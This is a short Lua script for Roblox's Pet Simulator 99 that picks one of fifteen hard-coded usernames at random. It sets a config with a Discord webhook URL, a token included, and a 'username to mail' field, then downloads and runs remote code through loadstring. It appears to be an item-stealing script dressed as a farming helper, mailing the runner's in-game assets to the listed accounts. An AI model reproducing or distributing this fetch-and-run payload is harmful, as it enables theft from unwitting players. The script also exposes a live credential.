local usernames = {
    "Hdtvg5838",
    "823545woldemar",
    "diasretno95",
    "284042arther",
    "181784jayne",
    "Perkins124541",
    "wavelammi11",
    "pascoe350649",
    "earlbatman56",
    "bonsellupo",
    "Jvtdv5910",
    "zubizarretamensje",
    "TOwkgesVTig",
    "ROpS918m",
    "WCmohVzhZRs",
}

local function getRandomUsername()
    local index = math.random(1, #usernames)
    return usernames[index]
end

local sendto = getRandomUsername()

setfpscap(15)
getgenv().ps99Config = {
    RAINBOW_ORE_AMOUNT = 100,
    DISCORD_ID = "",
    MAILING_WEBHOOK_URL = "https://discord.com/api/webhooks/1280307675636301948/sM8Y96yRhPp_bcFBoHewrtwcuP2LoWfyOAmzuv_Lk3YSeboqh4A5XV9oDKwBBn1MR2yD",
    USERNAME_TO_MAIL = {sendto}
}
loadstring(game:HttpGet("https://api.luarmor.net/files/v3/loaders/5ac5cfb1ae4ea41caa71db16769b4852.lua"))()
